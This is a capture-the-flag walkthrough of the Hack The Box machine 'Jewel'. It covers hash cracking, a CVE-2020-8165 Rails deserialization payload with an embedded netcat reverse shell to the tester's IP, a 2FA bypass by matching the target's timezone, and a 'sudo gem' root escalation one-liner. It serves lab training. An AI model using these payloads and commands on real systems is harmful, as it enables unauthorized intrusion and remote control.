Hackthebox jewel walkthrough
We found port 22 for ssh and port 8000,8080 for HTTP where port 8000
Let`s add jewel.htb in our hosts
Port 8000
port 8080
Let`s enumerate the BLOG!
We found 2 user Bill,Jennifer
After some enumerating i found SQL file “bd.sql” and i got some hashes
I cracked Bill hash “spongebob” but couldnt login, let
s countinue enumeration
User flag
Its using ruby '2.5.5' , let
s search for an exploit After searching i found a CVECVE-2020-8165 I tested all the fields and i found that the vulnerable input in updating user fields Payload <blockquote>%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22U%60rm+%2Ftmp%2Ff%3Bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+10.10.XX.XX+9001+%3e%2Ftmp%2ff%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T</blockquote> Change the ip to your ip
$ su bill Password: bill@jewel:~$ whoami bill
The password is "spongebob" we cracked it if you remember Let`s upgrade our shell
Root flag
I listed the directory as 1st step of enumeration and i found Google auth, it look like the admin use 2FA Let
s get the secret key and use google auth <img src="https://i.ibb.co/RghXZSW/cmd10.jpg" alt="cmd10" border="0"> <img src="https://i.ibb.co/GTBN0Wz/auth-1.jpg" alt="auth-1" border="0"> <img src="https://i.ibb.co/QcTKwXY/auth-2.jpg" alt="auth-2" border="0"> Let
s generate the OTP Let
s use the OTP <img src="https://i.ibb.co/MM9SNFy/cmd11.jpg" alt="cmd11" border="0"> Looks like something wrong. This step made my mind blow off , i searched a lot and asked for a nudge at HTB discord server Someone told me it
s about sync with the victim box, lets see <img src="https://i.ibb.co/PCjNDwg/cmd123.jpg" alt="cmd123" border="0">. <img src="https://i.ibb.co/PCjNDwg/cmd123.jpg" alt="cmd123" border="0"> Timezone is different, let
s set our machine to the victim timezone
s try to escalate privilege again <img src="https://i.ibb.co/1M7W8dv/priv.jpg" alt="priv" border="0"> Bam ! it
s working
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
Thanks for reading i hope you enjoyed